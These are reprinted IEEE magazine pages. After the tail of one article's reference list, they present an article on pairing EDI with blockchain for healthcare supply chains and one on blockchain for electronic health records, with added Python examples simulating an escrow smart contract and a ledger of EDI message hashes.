3. R. A. Jones and B. M. Horowitz, “System-aware cyber security architecture,” in Proc. IEEE 2011 Eighth Int. Conf. Information Technology: New Generations, pp. 914–917.

4. M. Franz, “Making multivariant programming practical and inexpensive,” IEEE Security Privacy, vol. 16, no. 3, pp. 90–94, May/June 2018.

5. M. Albanese and S. Jajodia, “Defending from stealthy botnets using moving target defenses,” IEEE Security Privacy, vol. 16, no. 1, pp. 92–97, Jan./Feb. 2018.

6. G. L. Babineau, R. A. Jones, and B. M. Horowitz, “A system-aware cyber security method for shipboard control systems with a method described to evaluate cyber security solutions,” IEEE Int. Conf. Technologies for Homeland Security (HST), 2012. doi: 10.1109/THS.2012.6459832.

7. B. T. Carter, G. Bakirtzis, C. R. Elks, and C. H. Fleming, “A systems approach for eliciting mission-centric security requirements,” Annu. IEEE Int. Systems Conf. (SysCon), 2018, pp. 1–8.

8. B. M. Horowitz, “Cybersecurity for unmanned aerial vehicle missions,” AFCEA SIGNAL, Apr. 2016, pp. 40–43.

9. K. J. Higgins, “State trooper vehicles hacked,” Dark Reading, Sept. 2015. [Online]. Available: https://www.darkreading.com/attacks-breaches/state-trooper-vehicles-hacked-/d/d-id/1322415?

10. C. Gay, B. Horowitz, P. Bobko, J. Elshaw, and I. Kim, “Operator suspicion and decision responses to cyber-attacks on unmanned ground vehicle systems,” Proc. Hum. Factors Ergon. Soc. Annu. Meet., vol. 61, no. 1, pp. 226–230, Sept. 28, 2017. doi: 10.1177/1541931213601540.

11. Draper, “Inherently secure processor.” Accessed on: Oct. 2019. [Online]. Available: https://www.draper.com/explore-solutions/inherently-secure-processor.

12. C. Gay, B. Horowitz, J. J. Elshaw, P. Bobko, and I. Kim, “Operator suspicion and human–machine team performance under mission scenarios of unmanned ground vehicle operation,” IEEE Access, vol. 7, pp. 36371–36379, 2019. doi: 10.1109/ACCESS.2019.2901258.

BARRY M. HOROWITZ is the Munster Professor of Systems Engineering at the University of Virginia, Charlottesville. His research interests include system architecture and design. Contact him at h8e@virginia.edu.


30 August 2020 Published by the IEEE Computer Society 2469-7087/20 © 2020 IEEE

EDITOR: Jinan Fiaidhi, Lakehead University, [email protected]

DEPARTMENT: EXTREME AUTOMATION

EDI with Blockchain as an Enabler for Extreme Automation

Jinan Fiaidhi and Sabah Mohammed, Lakehead University

Sami Mohammed, University of Victoria

Extreme automation is the latest initiative to have emerged from several “hands-free” innovations like autonomous ships and submarines, autonomous passenger aircraft, drone freight delivery, autonomous robotic surgery, automated knowledge discovery, courier package delivery, and self-writing software. In such markets, every company is a software company in some way and customers expect software to perform flawlessly and effectively. When it doesn’t, the brand suffers.

In the supply chain, everything from attracting customers and securing deals to managing transactions and follow-ups based on B2C (business-to-consumer) or B2B (business-to-business) platforms needs to be transparent, secure, and able to be changed on the fly. Everything needs to happen at lightning speed because winning market share requires the use of highly dynamic, fast-moving environments. Healthcare supply-chain management deals with the informational and physical resources (such as manufacturing, procuring, storing, and transporting different product types such as surgical supplies, medical devices, and pharmaceuticals) needed for delivering services to the end customer (see Figure 1).

According to a recent Allied Market Research report,1 the healthcare supply-chain management market is segmented based on delivery model, software, hardware, end customer, and geography. Based on the delivery model, the market segments covered in the report are cloud-based, web-based, and on premise. In addition, healthcare supply-chain management software includes supplier management software, procurement software, transportation management software, and others. The hardware segment consists of barcode and RFID systems and others. End customers served by the market consist of healthcare providers, suppliers, distributors, and others. The market for healthcare supply-chain management is segmented based on geography: North America; Europe; Latin America, Middle East, and Africa (LAMEA); and Asia Pacific. Similar segmentations are also seen in other industries, as supply-chain management is more complex in the era of globalization and extreme automation.

There are many factors that need to be considered and must be part of more effective solutions, like understanding that outsourcing, product personalization, authentication, and transportation are all part of the new business reality. In this new era, supply-chain visibility must be carefully defined in a consistent way across industries. ERP (enterprise resource planning)-to-ERP connectivity is not the answer when electronic data interchange (EDI) is the only workhorse of visibility. B2B and B2C efforts are now three decades old, yet the primary EDI mechanisms are based on fragmented and manual efforts. However, trying to install a new ERP system and a new EDI system at the same time doesn’t double risks—it squares them.2 Business leaders in the era of extreme automation need to pave a new path to solve these new challenges.

EDI STRENGTHS AND WEAKNESSES

EDI is the universal language for B2B and B2C communication, and has changed the way that companies share information, ensuring that data isn’t compromised by human error. EDI has become the common language for interchanging files and information such as product activity data, purchase orders, and shipment and billing notices. Rather than sending faxes or emails for each individual event, EDI allows computers to communicate directly with each other, ensuring greater accuracy and instantaneous notice.3 EDI can scale to include different collaborating partners by introducing a portal or cloud layer that partners can access securely without a data-integration solution. An example of such a solution is the Edicom portal (see Figure 2).

This article originally appeared in vol. 20, no. 4, 2018.

However, businesses are moving away from the standardization principles that brought forth greater efficiency in the retail industry and inadvertently introduced more work for vendors that must collect data from numerous retailers. Improving supply-chain visibility is critical as supply chains grow more complex with more collaborating partners. Having different vendor portals will damage the efficiency of B2B and B2C communicating networks. EDI as a universal language is a slow-moving ship and there are no benefits for a single company in a partner network to change unless other trading partners also follow. This was one of the main reasons XML never really took off, although it was (and still is) a far superior format for electronic business transactions than the clunky 30-year-old flat-file formats used by traditional EDI standards, such as EDIFACT and ANSI X12.4

EDI needs a distributed ledger technology (DLT) for shared and synchronized digital data that is geographically spread across multiple sites, countries, or institutions. With a DLT, there is no central administrator or centralized data storage. Without DLT, EDI messages will have major difficulties mapping messages between partners. Each message has many sectors that, arranged in a particular way, constitute the “map” for the message. The segments are populated with data, such as customer number, product number, gross price, and net price. There are numerous opportunities for error—if a product number is changed on the sending or receiving end, data is entered incorrectly, new master data isn’t uploaded into someone’s system, a suffix or prefix is added to a value in one of the sections, a trading partner changes part of the map and fails to communicate the change, or a required field is blank, other partners will not be informed. Thus, new methods are needed to keep these records—ranging from emails to spreadsheets to third-party services—in sync.

FIGURE 1. End-to-end healthcare supply chain.

FIGURE 2. Scaling electronic data interchange (EDI) for collaborating partners through the use of web portals (Source: www.edicomgroup.com/solutions/edi/components/partner_web_portal.html)

EDI cannot support the complex supply-chain processes of today because the data transfer between the various ERP systems opens up potentially critical situations. Customers and suppliers need a shared view of the actual supply situation and an automated early detection system. This will efficiently control organizations’ supply chains, enabling them to collaboratively resolve identified problems and avoid costly bottlenecks. Trust is key to the success of global cross-organization collaboration, and trust comes with transparent processes. DLT promises to share, facilitate, verify, or enforce the negotiation or performance of a contract. This is why a DLT system is needed along with an existing EDI.

THE BLOCKCHAIN DLT SYSTEM

Blockchain systems form a decentralized ledger, a type of database that is stored in several different physical locations. Processing is distributed among multiple stakeholders, and each party receives real-time updates in a completely secure system. These aspects make a decentralized ledger an ideal system for the creation, issuing, and execution of contracts that can help protect business models and enable collaboration.5 However, blockchain is not an alternative to EDI systems, although it offers a way for trading partners to communicate quickly and clearly without the risk of errors or repudiation.

Consider how transactions take place through EDI systems, which typically involve a buyer, a seller, and a third-party logistics provider. EDI system transactions hinge upon one-way, point-to-point communication, meaning that two of the three parties can exchange messages with one another, but the third party is left out. Because blockchain is a shared ledger, everyone can see what is going on. Disputes would not happen, repudiation would be unnecessary, and sharing information would be much more efficient.6 Another advantage of blockchain technology is the security and integrity of distributed networks. Although it started as a disrupting technology in the financial industry for the decentralized digital currency Bitcoin, blockchain finds more and more use cases in other industries such as energy and freight.7

A study by IBM found that 16 percent of surveyed healthcare executives had solid plans to implement a blockchain solution this year, while 56 percent expected to by 2020.8 Healthcare companies, tech innovators, and the rest of the healthcare industry are grappling with what is possible now and what blockchain could solve in the future. The overall vision for blockchain to disrupt healthcare in the future would be to create a common database of health information that physicians and providers could access no matter what electronic medical system they used, provide higher security and privacy, decrease the admin time for physicians so they have more time to spend on patient care, and improve the sharing of research results to facilitate new treatment therapies.9

ADVANTAGES OF BLOCKCHAIN

Blockchain won’t be a cure-all for the industry today, but it would certainly be a step in the right direction. The healthcare industry is drowning in data—clinical trials, patient medical records, complex billing, medical research, and more. Adoption and implementation of blockchain will be an evolution over time as blockchain applications are vetted and adopted and as the industry comes together to solve collaboration and governance issues. As it always is with new technologies, the full possibility of what might transpire in the future is unknown at this time. However, there are many advantages of using blockchain for an industry like healthcare. Among these advantages are the following.

› Transparency and collaboration. Blockchain is a solid mechanism for documenting a transaction across the supply chain and sharing it with stakeholders. The system works without a central repository or single administrator.

› Medical data management. Blockchain has great potential to link medical data across systems and stakeholders. An example of the success of blockchain in managing healthcare data is the MedRec system.10 MedRec intends to improve electronic medical records and allow patients’ records to be accessed securely by any provider who needs it. The goal is to give patients and their healthcare providers one-stop access to their entire medical history across all providers they have ever seen. Additionally, if patients wish to grant researchers access to their personal medical records, the data would be provided anonymously to be used for research, which could make medical breakthroughs happen faster.

› Scalability and availability. Blockchain 2.0 is solving the scalability issues for writing transactions. Anyone worldwide can access the decentralized datasets.

› Security and privacy. Establishing a trust network depends on the healthcare system as an intermediary to establish point-to-point sharing and bookkeeping of the exchanged data. A node does not have to reveal the physical identity of the person or organization and the payload can have a digital signature with private cryptographic keys.

› Patient–provider relationship contract. This contract links two nodes in the system, where one node stores and manages medical records for the other. This relationship could exist between a particular care provider and a patient, but extends to cover any pairwise data stewardship interaction.

› Summary contract. This serves as a trail of breadcrumbs, where each participant in the system can locate a summary of their relationships with other participants. The summary contract encodes a list of references to patient–provider relationship contracts, showing current and previous engagements with other nodes on the system. Each relationship also stores a “status” variable, indicating when the relationship was established and whether it has been approved by the patient.

› Reduced transaction costs. The use of near-real-time processing would make the system more efficient.

› Innovation. The dominance of open source models is a driver for computing innovation. IBM, Microsoft, and Bitcoin published their solutions on the open source repository Github. Blockchain-as-a-Service solutions like Microsoft Azure make it easy for anyone in the world to use the service.

SMART CONTRACTS

Blockchain uses a smart contract, which stores the ground rules of the contract, automatically executes the contract, verifies its compliance, and evaluates the outcome without the need for a third party. Smart contracts are visible to all users and remove the need for a middleman. The supply-chain industry needs smart contracts for the next generation of global distribution systems. As an example, a smart contract starts when a patient schedules surgery. At this point, the contract performs the initial setup of the blockchain and mines for other related caregiver nodes. Caregiver partners join the private blockchain, where no one person is the owner of the data and all partners are part of a consortium or community of practice. All partners can write and read data into or from the blockchain. When partner A writes data into the blockchain, that data can be validated by the consortium. Once the data is validated it can be shared with other nodes including external repositories. A smart contract is pre-written code that utilizes both EDI and blockchain communication protocols. Figure 3 illustrates the EDI blockchain for a surgery supply-chain cycle.

Generally speaking, if a business can satisfy the checklist below, it has a good use case for EDI and blockchain.11


› Multiple parties need to be able to view, and possibly edit, the same data.

› Parties form a supply chain with the ability to communicate with third parties.

› There is a lack of trust between parties trying to conduct transactions.

› Several of the transactions are sequential in the supply chain, and all parties conducting the transactions need to know the interdependencies of those transactions.

› Middlemen are in the ecosystem mainly because of the lack of trust among the parties that need to conduct transactions.

› Parties would gain financially if transaction times can be reduced.

The use of smart contracts will allow the advancement of multiple services that were suffering from bottleneck delays because of complex logistics and privacy protocols. Suppose a patient has agreed that their clinical or medical data can be used by anyone in clinical research who can satisfy a smart contract by putting this data into a public blockchain. The enforcement of the smart contract can provide add-on services to facilitate collaboration and interoperability, similar to interoperable electronic healthcare record systems like the Fast Healthcare Interoperability Resources (FHIR) system.12 In this case, the smart contract would include:

› upfront micro-payment for the access,

› requirement for escrow of the crypto coin to be unlocked to the patient if other terms are violated,

› terms of protection of the data,

› kinds of clinical trials allowed (for example, heart conditions but not brain),

› agreement to keep all research public,

› agreement to contact patient if patient could benefit from new treatment detected,

› agreement to contact patient if some treatable medical condition not previously known is discovered, and

› agreement to not contact patient if a terminal condition is detected.

A clinical trial firm that meets these requirements would satisfy the contract and gain access to the data. If the firm violated any of the terms, the smart contract would automatically transfer the escrow coin to the patient. The possibility of using smart contracts with patients’ medical records gives patients control over their data.
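The escrow terms just listed can be modelled as a small state machine. The following Python block is an added example, not the article's code and not code for any particular blockchain platform: it simulates the contract's enforcement logic (fee and escrow taken on access, automatic transfer of the escrow to the patient when a term is violated, return of the escrow when the engagement completes cleanly). The `Terms` and `DataAccessContract` classes, the wallet balances and the finding kinds are assumptions made for the illustration.

```python
# Added example (not from the article): a plain-Python simulation of the
# patient-data access contract with escrow. Not code for a real chain.
from dataclasses import dataclass, field
from typing import Dict, List, Set


@dataclass
class Terms:
    access_fee: int            # upfront micro-payment to the patient
    escrow_amount: int         # coin locked for the life of the engagement
    allowed_trials: Set[str]   # e.g. {"heart"}; any other kind is refused
    keep_research_public: bool = True
    contact_if_terminal: bool = False   # article: no contact for a terminal finding


@dataclass
class DataAccessContract:
    patient: str
    terms: Terms
    balances: Dict[str, int]            # constructed wallet balances (assumption)
    state: str = "open"                 # open -> active -> completed | breached
    researcher: str = ""
    escrow: int = 0
    log: List[str] = field(default_factory=list)

    def request_access(self, researcher: str, trial_kind: str) -> bool:
        """Grant access only if the trial kind is permitted and the researcher
        can pay the fee plus the escrow deposit."""
        if self.state != "open" or trial_kind not in self.terms.allowed_trials:
            return False
        cost = self.terms.access_fee + self.terms.escrow_amount
        if self.balances.get(researcher, 0) < cost:
            return False
        self.balances[researcher] -= cost
        self.balances[self.patient] = self.balances.get(self.patient, 0) + self.terms.access_fee
        self.escrow = self.terms.escrow_amount
        self.researcher, self.state = researcher, "active"
        return True

    def _breach(self, reason: str) -> None:
        """Automatic enforcement: the escrow moves to the patient and access ends."""
        self.balances[self.patient] += self.escrow
        self.escrow = 0
        self.state = "breached"
        self.log.append(reason)

    def publish(self, public: bool) -> str:
        """Research output must be public if the terms say so."""
        if self.state != "active":
            return self.state
        if self.terms.keep_research_public and not public:
            self._breach("research kept private")
        return self.state

    def report_finding(self, kind: str, patient_contacted: bool) -> str:
        """kind is 'benefit', 'treatable' or 'terminal'; the terms decide whether the
        patient must, may or must not be contacted about it."""
        if self.state != "active":
            return self.state
        must_contact = kind in ("benefit", "treatable")
        may_contact = must_contact or (kind == "terminal" and self.terms.contact_if_terminal)
        if must_contact and not patient_contacted:
            self._breach(f"patient not contacted about {kind} finding")
        elif patient_contacted and not may_contact:
            self._breach(f"patient contacted about {kind} finding")
        return self.state

    def complete(self) -> str:
        """Engagement ended with every term honoured: escrow returns to the researcher."""
        if self.state == "active":
            self.balances[self.researcher] += self.escrow
            self.escrow = 0
            self.state = "completed"
        return self.state
```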

According to Forbes, pharmaceutical companies incur an estimated annual loss of $200 billion due to counterfeit drugs globally.13 Using smart contracts, it is possible to trace drugs over their whole lifecycle. Each ingredient and substance is numbered and tracked with geographic and other relevant information. The tracking data is then added to the blockchain (only the metadata is put in the blockchain for efficiency reasons).
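The out-of-sync EDI records discussed earlier (a product number altered on one end, a suffix added to a value) and the practice just mentioned of putting only metadata on the chain can be shown together in one small model. The following Python block is an added example, not code from the article or from any product it cites: it records a SHA-256 fingerprint of each EDI message on a hash-linked ledger, so a partner can check whether its local copy matches what was recorded and whether the ledger itself has been edited. The X12-style purchase order, the partner names and the message ids are constructed sample data.

```python
# Added example (not from the article): EDI message fingerprints on a
# hash-linked ledger so partners can detect out-of-sync or edited records.
import hashlib
import json
from dataclasses import dataclass
from typing import List, Optional


def canonical_edi(message: str) -> str:
    """Normalize an EDI message so every partner hashes identical bytes:
    drop blank lines and per-segment padding, keep segment order."""
    return "\n".join(seg.strip() for seg in message.splitlines() if seg.strip())


def fingerprint(message: str) -> str:
    """SHA-256 of the canonical message. This digest is the only thing
    about the payload that is written to the shared ledger."""
    return hashlib.sha256(canonical_edi(message).encode("utf-8")).hexdigest()


@dataclass
class Block:
    index: int
    prev_hash: str
    sender: str
    message_id: str
    message_hash: str   # metadata only; the EDI payload stays with the partners
    block_hash: str = ""

    def compute_hash(self) -> str:
        body = json.dumps(
            {"index": self.index, "prev_hash": self.prev_hash, "sender": self.sender,
             "message_id": self.message_id, "message_hash": self.message_hash},
            sort_keys=True,
        )
        return hashlib.sha256(body.encode("utf-8")).hexdigest()


class MetadataLedger:
    """Append-only, hash-linked list of EDI message metadata shared by all partners.
    Corrections are new records; earlier records are never rewritten."""

    def __init__(self) -> None:
        genesis = Block(0, "0" * 64, "consortium", "genesis", "0" * 64)
        genesis.block_hash = genesis.compute_hash()
        self.chain: List[Block] = [genesis]

    def append(self, sender: str, message_id: str, message: str) -> Block:
        prev = self.chain[-1]
        block = Block(prev.index + 1, prev.block_hash, sender, message_id, fingerprint(message))
        block.block_hash = block.compute_hash()
        self.chain.append(block)
        return block

    def verify_chain(self) -> bool:
        """Recompute every block hash and back-link; editing any record breaks the chain."""
        for i, block in enumerate(self.chain):
            if block.block_hash != block.compute_hash():
                return False
            if i > 0 and block.prev_hash != self.chain[i - 1].block_hash:
                return False
        return True

    def latest(self, message_id: str) -> Optional[Block]:
        """Most recent record for a message id (a later correction supersedes)."""
        for block in reversed(self.chain):
            if block.message_id == message_id:
                return block
        return None

    def check_copy(self, message_id: str, local_message: str) -> str:
        """Compare a partner's local copy with the recorded fingerprint.
        Returns 'in-sync', 'tampered' (copy differs from the record) or 'unknown'."""
        block = self.latest(message_id)
        if block is None:
            return "unknown"
        return "in-sync" if fingerprint(local_message) == block.message_hash else "tampered"


# Constructed X12-style 850 purchase order; sample data, not a real transaction.
PO_SENT = """ST*850*0001~
BEG*00*SA*PO12345**20200801~
PO1*1*10*EA*15.50**VP*SURG-KIT-42~
SE*4*0001~"""

# The receiving side's copy after a suffix was appended to the product number,
# one of the mapping errors the article lists.
PO_RECEIVED = PO_SENT.replace("SURG-KIT-42", "SURG-KIT-42A")


def demo() -> dict:
    """The buyer records the order; the same ledger answers both partners' checks."""
    ledger = MetadataLedger()
    ledger.append("buyer", "PO12345", PO_SENT)
    return {
        "chain_ok": ledger.verify_chain(),
        "buyer_copy": ledger.check_copy("PO12345", PO_SENT),
        "supplier_copy": ledger.check_copy("PO12345", PO_RECEIVED),
        "never_recorded": ledger.check_copy("PO99999", PO_SENT),
    }
```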

CONCLUSION

Although blockchain has enormous potential, it is important to remember that no new technology succeeds with the “rip-and-replace” method. Organizations using blockchain will have a greater impact if they augment existing, well-established technologies such as EDI systems. Using smart contracts that take into account legacy protocols like EDI and blockchain will benefit the ecosystem of every industry, including healthcare. The healthcare industry will need to adapt to the changing care delivery and the new financial model as it will save many billions of dollars, according to recent industry surveys.14,15

FIGURE 3. Blockchain with EDI for the surgery supply chain.

REFERENCES

1. Healthcare Supply Chain Management Market By Software (Supplier Management Software, Transportation Software And Procurement Software), Hardware (System, Barcode And RFID), Delivery Model (On Premise, Cloud Based And Web Based)—Global Opportunity Analysis And Industry Forecast, 2017-2023, report, Allied Market Research, 2017; www.alliedmarketresearch.com/healthcare-supply-chain-management-market.

2. M. Torman, “‘EDI’ Comes Before ‘ERP’,” Cleo, blog, 17 December 2012; www.cleo.com/blog/edi-comes-before-erp.

3. “The Reasons Of EDI Failure,” GeoViz, blog, 1 August 2015; www.geo-viz.com/blog/the-reasons-of-edi-failure.

4. M. Wallgren, “EDI And Blockchain—A Match Made In Heaven?,” LinkedIn, blog, 26 March 2018; www.linkedin.com/pulse/edi-blockchain-match-made-heaven-mathias-wallgren.

5. “Smart Contracts And Blockchain In The Electronics Industry,” Orbweaver, blog, 19 January 2018; www.orbweaver.com/blog/smart-contracts-and-blockchain-in-the-electronics-industry.

6. B. Lester, “How Blockchain Technology Augments EDI Systems,” Remedi, blog, 15 March 2018; www.remedi.com/blog/how-blockchain-technology-augments-edi-systems.

7. M. Buchhorn-Roth, “Blockchain And EDI For Secure Data Exchange In Supply Chains,” LinkedIn, blog, 14 November 2018; www.linkedin.com/pulse/blockchain-edi-secure-data-exchange-supply-chains-buchhorn-roth.

8. H. Fraser, “How Blockchains Can Provide New Benefits For Healthcare,” IBM, blog, 20 February 2017; www.ibm.com/blogs/think/2017/02/blockchain-healthcare.

9. B. Marr, “This Is Why Blockchains Will Transform Healthcare,” Forbes, blog, 29 November 2017; www.forbes.com/sites/bernardmarr/2017/11/29/this-is-why-blockchains-will-transform-healthcare/#1593b3381ebe.

10. A. Ekblaw et al., A Case Study For Blockchain In Healthcare: ‘MedRec’ Prototype For Electronic Health Records And Medical Research Data, white paper, August 2016; www.healthit.gov/sites/default/files/5-56-onc_blockchainchallenge_mitwhitepaper.pdf.

11. P. Srinivasan, “Healthcare Blockchain: How Smart Contracts Could Revolutionize Care Delivery,” Prolifics, blog, 2017; www.prolifics.com/blog/healthcare-blockchain-how-smart-contracts-could-revolutionize-care-delivery.

12. J. Moehrke, “Healthcare Blockchain—Big-Data Pseudonyms On FHIR,” Healthcare Exchange Standards, blog, 18 May 2016; https://healthcaresecprivacy.blogspot.com/2016/05/healthcare-blockchain-big-data.html.

13. J. Moehrke, “Healthcare Use Of Blockchain Thru Creative Use Of Smart-Contracts,” Healthcare Exchange Standards, blog, 10 November 2017; https://healthcaresecprivacy.blogspot.com/2017/11/healthcare-use-of-blockchain-thru.html.

14. R. Das, “Does Blockchain Have A Place In Healthcare?,” Forbes, blog, 8 May 2017; www.forbes.com/sites/reenitadas/2017/05/08/does-blockchain-have-a-place-in-healthcare.

15. Blockchain: A Healthcare Industry View, Capgemini, 2017; www.capgemini.com/wp-content/uploads/2017/07/blockchain-a_healthcare_industry_view_2017_web.pdf.

JINAN FIAIDHI is a full professor and professional engineer with the Department of Computer Science and founder of the Smart Health FabLab at Lakehead University. She is an adjunct research professor at the University of Western Ontario, editor in chief of the new IGI Global International Journal of Extreme Automation in Healthcare, and chair of Big Data for eHealth with IEEE Communications Society. Contact her at [email protected].

SABAH MOHAMMED is a full professor and professional engineer with the Department of Computer Science and co-founder of the Smart Health FabLab at Lakehead University. He is also an adjunct professor at the University of Western Ontario and chair of Smart and Connected Health with IEEE Communications Society. Contact him at mohammed@lakeheadu.ca.

SAMI MOHAMMED is a graduate student in the Computer Science Department at the University of Victoria. Contact him at [email protected].


36 August 2020 Published by the IEEE Computer Society 2469-7087/20 © 2020 IEEE

EDITOR: Jeffrey Voas, NIST, [email protected]

DEPARTMENT: CYBERTRUST

Blockchain and Electronic Healthcare Records
Nir Kshetri, University of North Carolina at Greensboro

There is a growing need to both secure patient health data from unauthorized breaches and at the same time make access to such data easier for patients. Blockchain may provide a solution.

Cyberattacks against healthcare providers pose serious concerns. In 2015 alone, data breaches in healthcare exceeded 112 million records.1 Current infrastructure cannot guarantee the privacy and security of patient data, and the failure to prevent access to healthcare information by unauthorized persons can harm patients.

The current model of handling electronic healthcare records (EHRs) presents yet another problem: healthcare organizations have shown a tendency to act as custodians or stewards of patient data. This leads to inefficiency and delay in patient care. For instance, a patient’s treatment may be delayed simply because medical information sent from one service provider does not reach another in a timely manner.

Blockchain may offer a solution for addressing current EHR practice limitations. Blockchain initiatives have been implemented by governments, the private sector, and public–private partnership projects. The U.S. Food and Drug Administration (FDA) and IBM Watson Health have teamed up to investigate the potential benefits of blockchain in healthcare; initial efforts have focused on oncology-related data and a blockchain framework.

Blockchain enables the collection of data from a variety of sources and keeps those data in an audit trail of transactions. Blocks hold transaction and other data, and the accountability and transparency of transactions are maintained during this data-exchange process. The FDA and IBM believe that blockchain can support the exchange of data from multiple sources on agreed-to terms and for purposes that a patient approves of and consents to. The data exchanged may include EHRs, clinical trials, genomic data, and information gathered from new sources, such as mobile devices, wearables, and Internet of Things devices.2

In the blockchain world, permissionless and permissioned chains exist. In a permissionless blockchain such as the open-platform bitcoin, anyone can join. Conversely, private or permissioned blockchains are restrictive, and access must be granted by some authority (e.g., https://www.americanbanker.com/opinion/a-public-or-private-blockchain-new-ethereum-project-could-mean-both). Permissioned blockchains, which are more effective in sharing and managing EHRs, make it possible to share real-time data among participants of healthcare systems and conduct secure transactions. After a transaction is validated by consensus, a permanent record is produced and added to the existing blockchain as a new block (https://tinyurl.com/ycuvnrxw).

In this article, we look at the possible roles of blockchain in strengthening the security and privacy of EHRs and improving efficiency. However, blockchain enforces transparency, which may jeopardize privacy without the proper design considerations.

CHALLENGES OF THE CURRENT EHR APPROACH

Current EHR models present problems providing efficient healthcare and guaranteeing the security and privacy of patient data. Several of these problems are described in the following.

This article originally appeared in Computer, vol. 51, no. 12, 2018. Digital Object Identifier 10.1109/MC.2018.2880021. Date of publication: 5 February 2019.


Data storage

Current models rely on passwords containing shared secrets that are exchanged and stored on potentially insecure clouds. This approach has led to well-publicized cyberdisasters, such as one in December 2014, where hackers broke into the servers of U.S. health insurer Anthem and stole sensitive information on 80 million customers and employees.3 Such a breach is less likely to occur in a blockchain model because data are not centrally stored, provided the records themselves stay off-chain and encrypted; a ledger that carried plaintext records would simply replicate the target to every node.

Data sharing

In a nonblockchain world, healthcare organizations typically follow three models to facilitate the interoperability of medical data: push, pull, and view.4 In a push model, medical information is sent from one provider to another (e.g., from an emergency room physician to a primary care doctor). In a pull model, a provider asks another provider for information (e.g., a cardiothoracic surgeon consulting with a primary care doctor). Finally, in the view model, a provider looks at another provider’s patient record. For example, a cardiologist may examine a patient X-ray taken at an urgent care center.

Access to healthcare data must be accompanied by obligations to the data. It is important for healthcare companies handling identifiable information to structure such obligations by associating metadata (i.e., information about information) with data sets.5 In the current infrastructure, this is more easily said than done. A major drawback of these models is that access to patient data is not audited in a standardized way. The lack of audit trails means that there is no guarantee of data integrity from the point of data generation to the point of data usage, thus making it difficult to identify the perpetrators of data breaches. Some hospitals still rely on paper medical records and even paper towels.

Fraud is rampant in the medical industry. There have been instances of employees stealing patients’ personal data and misusing them (https://tinyurl.com/y7b8rfta) as well as cases of fraudulent claims submitted to insurance providers using falsified patient medical information and fake identities of doctors. In one scam, employees and doctors at a Long Island-based medical practice defrauded Medicare and Medicaid of US$50 million over a 12-year period by submitting bogus healthcare claims using patients’ EHRs (https://tinyurl.com/y9lrhaqt).

Current healthcare systems also fail patients when it comes to informed consent (https://tinyurl.com/yclk4lxd). In the pull model, consent often occurs on an informal and ad hoc basis. Due to time constraints, doctors are often unable to help patients understand the processes related to consent. As a result, patients may not know what questions or whom to ask. It may also not be possible for patients to receive straightforward answers. While patients have the right to stipulate with whom their information may be exchanged, some healthcare organizations lack the capacity to record and implement such stipulations.

Efficiency

With respect to efficiency, current practice leaves a great deal to be desired. For instance, in the push model, if a patient is transferred to a different hospital, the new hospital may not be able to access the data “pushed” from the first hospital. Patients often feel the frustration of repeatedly supplying the same information to different healthcare providers or different people associated with the same healthcare provider (https://tinyurl.com/y7x83a87).

Current approaches fail to manage medical records generated by multiple healthcare institutions. Because data are scattered across various medical institutions, patient data may become lost (https://tinyurl.com/y7x83a87).

Regulations and policies governing these approaches vary greatly across jurisdictions based on, inter alia, local practice and national privacy policy enforcement. In the United States, laws vary with respect to whether a consent form is required to disclose patient records, the types of medical records patients can access, and procedures for providing patient records to a third party (http://www.apa.org/monitor/jan03/hipaa.aspx).

BLOCKCHAIN BENEFITS

To understand blockchain’s ability to address security and privacy issues (not only those related to EHRs), we consider blockchain from the perspective of identity and access management, which involves controlling information such as patient identity on computer networks. The key issues in identity and access management concern 1) information that authenticates the subject’s identity, 2) information that describes the information (metadata), and 3) actions that various participants are authorized to know and perform.

The first three rows in Table 1 show current issues related to identity and access management in healthcare that may be improved upon by using blockchain.

As previously mentioned, there are drawbacks to existing identity-management techniques that rely on password-based systems. In a blockchain model, a patient’s medical records (or, in designs that keep the records off-chain, their fingerprints) are held in the ledger, encrypted under keys that only the patient controls, and every transaction on the record is signed with the patient’s private key. While a blockchain-based system is not 100% foolproof (e.g., a person’s private key can be stolen, and a stolen or lost key has no password-reset equivalent), it is thought to be more secure than most other current systems.

Blockchain offers audit trails, i.e., documentation of the events related to the creation, modification, and deletion of electronic records, thus resulting in transparency. Researchers at the MIT Media Lab and Boston’s Beth Israel Deaconess Medical Center proposed MedRec, a blockchain-based decentralized record management system to handle EHRs. MedRec manages authentication, confidentiality, accountability, and data sharing.7 Using this system, patients can access their medical information from different providers and treatment sites. An immutable log of all transactions involving a patient’s information is created and provided to the patient.7 MedRec does not store patients’ health records in the chain; rather, it stores each record’s signature, a hash of its contents, in the blockchain. Checking a retrieved copy against that signature gives assurance that the copy obtained is the unaltered record.

TABLE 1. Improving security and efficiency in healthcare: Blockchain’s potential improvements.

Key issue in identity and access management: Information authenticating the subject’s identity.
Explanation and examples: Information to verify that someone is who he/she claims to be. Examples include a username and password or a thumbprint.
Challenges with the current system: Current identity-management techniques in hospitals rely on password-based systems, which involve shared secrets that are exchanged and stored on insecure systems.
Blockchain’s potential to address the challenge: In blockchain-based identity authentication, each transaction needs to be signed by the correct private key. Only the patient has the private key.

Key issue in identity and access management: Information describing the information.
Explanation and examples: Information about the flow of different pieces of data among participants (e.g., healthcare vendor and patients) and records of data transactions. Information about users’ preferences regarding how their data can be used. Consent management records between patients and healthcare services providers.
Challenges with the current system: There are no audit trails of who accessed patients’ data. Some hospitals still rely on paper medical records.
Blockchain’s potential to address the challenge: The presence of an audit trail means that there is complete documentation of events related to the creation, modification, and deletion of electronic records.

Key issue in identity and access management: Actions that various participants are authorized to perform.
Explanation and examples: An access policy specifies the access rights and privileges of each participant. For example, insurance companies cannot have access to patients’ confidential medical records.
Challenges with the current system: Various parties are authorized to take actions based on patients’ data. Patients often have no control over their own data.
Blockchain’s potential to address the challenge: Blockchain prevents unauthorized and illegitimate access to data. Patients hold ownership and ultimate control over their information.

Key issue: Efficiency.
Explanation and examples: Inefficient administrative, logistical, and service delivery processes lead to higher costs, lost time, and fewer benefits.6
Challenges with the current system: Inefficient procedures to transfer data across healthcare services providers. Policy and regulatory heterogeneity across jurisdictions.
Blockchain’s potential to address the challenge: A consumer has access to her/his up-to-date healthcare information and can forward it to a healthcare service provider as and when needed.

Using blockchain, patients hold ownership and ultimate control over their information and decide where their records can travel. In this way, the locus of control is shifted from the institution providing healthcare to the patient. For patients who do not want to manage their data, service organizations may evolve allowing patients to delegate that task to them.4
